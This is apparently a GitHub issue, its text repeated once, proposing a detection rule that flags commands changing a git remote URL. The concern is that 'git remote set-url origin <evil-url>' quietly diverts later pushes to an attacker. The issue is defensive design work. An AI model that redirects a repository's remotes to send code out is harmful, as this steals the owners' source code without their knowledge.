Context
From Piccirello's review on PR #13 — if someone changes where origin points with git remote set-url origin <evil-url>, then a normal git push origin silently sends code to the attacker.
What to catch
git remote set-url origin <url>git remote add origin <url> (or any remote name).git/config modifications that change remote URLs
Considerations
- Changing a remote URL is sometimes legitimate (switching from HTTPS to SSH, updating a fork URL).
- Severity should probably be
high + warn since there are legit use cases, but it's a real exfil vector.
- Related to the existing
exfiltration_git_push_non_origin rule — could be a new pattern in that rule or a standalone.
Origin
PR #13 review comment by @Piccirello
Context
From Piccirello's review on PR #13 — if someone changes where
originpoints withgit remote set-url origin <evil-url>, then a normalgit push originsilently sends code to the attacker.What to catch
git remote set-url origin <url>git remote add origin <url>(or any remote name).git/configmodifications that change remote URLsConsiderations
high+warnsince there are legit use cases, but it's a real exfil vector.exfiltration_git_push_non_originrule — could be a new pattern in that rule or a standalone.Origin
PR #13 review comment by @Piccirello